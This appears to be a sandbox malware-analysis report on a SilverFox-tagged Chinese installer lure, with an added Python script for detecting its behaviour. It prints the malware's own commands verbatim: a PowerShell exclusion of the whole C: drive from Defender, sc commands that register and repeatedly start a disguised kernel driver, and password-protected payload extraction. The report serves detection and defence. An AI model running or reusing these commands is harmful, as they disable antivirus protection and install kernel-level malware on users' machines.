Windows Analysis Report
#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe

Overview

General Information

Sample name: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe (Joe Sandbox's #Uxxxx escaping of 安装程序_1.1.2.exe; 安装程序 is Chinese for "installer", so the lure file name reads "installer_1.1.2.exe")
renamed because original name is a hash value
Original sample name: _1.1.2.exe
Analysis ID: 1580551
MD5: 8af97a4879574d6e29e4e9fcd3a9bef0
SHA1: 3c0fcaf35b6f6cb6eb710ccb91c691fa629430ab
SHA256: ac7a870316c9f66b5750e39592f97e58a5ae8da0f05951a5f25047b15aa88041
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 92 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" MD5: 8AF97A4879574D6E29E4E9FCD3A9BEF0)
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp (PID: 1176 cmdline: "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" MD5: C9B4238B2FFEC70B575E52822B8A8F70)
      • powershell.exe (PID: 516 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6856 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe (PID: 3656 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT MD5: 8AF97A4879574D6E29E4E9FCD3A9BEF0)
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp (PID: 5228 cmdline: "C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT MD5: C9B4238B2FFEC70B575E52822B8A8F70)
          • 7zr.exe (PID: 4884 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6596 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1828 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5748 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3540 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1780 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2728 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6400 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7032 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4952 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1548 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6492 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6540 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6932 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6772 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5960 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6244 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3560 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5692 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6524 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4836 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5256 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3224 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 404 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Sigma rule matches (Source: Process started):

Event 1: powershell.exe (ProcessId 516), matched by three rules; rule authors: Florian Roth (Nextron Systems); Florian Roth (Nextron Systems); Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  • CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
  • CommandLine|base64offset|contains: *&
  • Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
  • ParentImage: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
  • ParentProcessId: 1176, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp

Event 2: sc.exe (ProcessId 3300), matched by two rules; rule authors: Nasreddine Bencherchali (Nextron Systems); Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
  • CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
  • CommandLine|base64offset|contains: (empty)
  • Image / NewProcessName / OriginalFileName: C:\Windows\System32\sc.exe
  • ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
  • ParentImage: C:\Windows\System32\cmd.exe
  • ParentProcessId: 1828, ParentProcessName: cmd.exe
No Suricata rule has matched
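The process tree and the Sigma matches above carry three behaviours a detection engineer would want to catch generically rather than by exact string: a Defender exclusion that covers an entire drive (including the Base64-encoded variant that the "Powershell Base64 Encoded MpPreference Cmdlet" rule targets), a kernel-mode service whose binPath is a .dll under Program Files instead of a .sys under System32\drivers, password-protected 7-Zip extraction of .dat blobs with the password on the command line, and the thirty-fold loop of sc start on the same service. The script below is an added example written for this page in Python; it is not Joe Sandbox output and not the Sigma rules' own logic. The event tuples are copied from the process tree above (with the sc start loop cut down to three iterations), and the tuple layout, the regexes, the "unusual driver path" heuristic and the loop threshold are assumptions of this example.

```python
"""Triage of the process-creation events shown in the report above (added example)."""
import base64
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample events (pid, image name, command line) copied from the
# process tree above; the thirty "sc start CleverSoar" iterations become three.
EVENTS: List[Tuple[int, str, str]] = [
    (516, "powershell.exe",
     "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""),
    (4884, "7zr.exe", "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"),
    (6596, "7zr.exe", "7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs"),
    (3300, "sc.exe",
     "sc create CleverSoar displayname= CleverSoar binPath= "
     "\"C:\\Program Files (x86)\\Windows NT\\tProtect.dll\" type= kernel start= auto"),
    (6272, "sc.exe", "sc start CleverSoar"),
    (2224, "sc.exe", "sc start CleverSoar"),
    (5748, "sc.exe", "sc start CleverSoar"),
]

# Add-MpPreference followed by an -Exclusion* switch; value may be quoted either way.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+"
    r"(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)


@dataclass
class Finding:
    pid: Optional[int]   # None for findings aggregated over several events
    rule: str
    detail: str


def tokenize(cmdline: str) -> List[str]:
    """Split on whitespace but keep double-quoted runs (paths with spaces) intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def encode_for_powershell(script: str) -> str:
    """Base64 of UTF-16LE, the encoding -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def effective_script(cmdline: str) -> str:
    """Decode -EncodedCommand/-enc/-ec/-e payloads; otherwise return the raw line."""
    toks = tokenize(cmdline)
    for i, t in enumerate(toks[:-1]):
        if t.lower() in ("-encodedcommand", "-enc", "-ec", "-e"):
            try:
                return base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                break
    return cmdline


def sc_args(tokens: List[str]) -> dict:
    """Parse sc.exe 'key= value' pairs (the space after '=' is sc's own syntax)."""
    args, i = {}, 0
    while i < len(tokens):
        t = tokens[i]
        if t.endswith("=") and i + 1 < len(tokens):
            args[t[:-1].lower()] = tokens[i + 1]
            i += 2
        else:
            if "=" in t:                       # tolerate the 'key=value' form too
                k, v = t.split("=", 1)
                args[k.lower()] = v
            i += 1
    return args


def triage(events, start_loop_threshold: int = 3) -> List[Finding]:
    findings, starts = [], Counter()
    for pid, image, cmdline in events:
        img, toks = image.lower(), tokenize(cmdline)
        if img in ("powershell.exe", "pwsh.exe"):
            m = EXCLUSION_RE.search(effective_script(cmdline))
            if m:
                value = m.group(2) or m.group(3) or m.group(4) or ""
                whole_drive = re.fullmatch(r"[A-Za-z]:\\?", value) is not None
                findings.append(Finding(pid, "defender_exclusion",
                    f"Exclusion{m.group(1)}={value}"
                    + (" (whole drive excluded)" if whole_drive else "")))
        elif img == "sc.exe" and len(toks) >= 3:
            verb, name = toks[1].lower(), toks[2]
            if verb == "create":
                a = sc_args(toks[3:])
                if a.get("type", "").lower() == "kernel":
                    path = a.get("binpath", "")
                    unusual = (not path.lower().endswith(".sys")
                               or "\\system32\\drivers\\" not in path.lower())
                    findings.append(Finding(pid, "kernel_driver_service",
                        f"{name}: binPath={path}, start={a.get('start', '')}"
                        + (" (path/extension unusual for a driver)" if unusual else "")))
            elif verb == "start":
                starts[name] += 1
        elif re.fullmatch(r"7z[ra]?\.exe", img) and len(toks) >= 3 and toks[1].lower() in ("x", "e"):
            archive = next((t for t in toks[2:] if not t.startswith("-")), "?")
            password = next((t[2:] for t in toks[2:] if t.lower().startswith("-p")), None)
            if password is not None:
                findings.append(Finding(pid, "password_protected_extract",
                                        f"{archive} with password {password!r}"))
    for name, n in starts.items():
        if n >= start_loop_threshold:
            findings.append(Finding(None, "service_start_loop", f"{name} started {n} times"))
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"pid={f.pid} {f.rule}: {f.detail}")
```

The recovered 7-Zip passwords are worth keeping with the case: res.dat and locale3.dat are the containers from which the dropped files came, and the same passwords are needed to open them in an analysis VM.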


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; ReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbc; ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbc; ReversingLabs: Detection: 26%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe; Virustotal: Detection: 9%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000C.00000003.2164014609.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2163901201.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr (the PDB path shows tProtect.dll is a 64-bit kernel-mode driver build, objfre_wnet_amd64 being a WDK free-build target; the .dll extension is cosmetic, and the sc create command in the process tree registers the file with type= kernel)
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp; Code function: 6_2_6CB5E090 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000002.2282777107.0000000003E89000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.dr, update.vbc.2.dr; Strings found in binary or memory (DigiCert CA-issuer, CRL, OCSP and CPS URLs; the trailing characters such as 0E or 0C are the DER tag and length bytes that follow each URL, not part of it):
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108115656.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108502231.000000007F0FB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000000.2109976636.00000000002F1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000000.2129491702.000000000076D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.dr; Strings found in binary or memory:
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps

Operating System Destruction

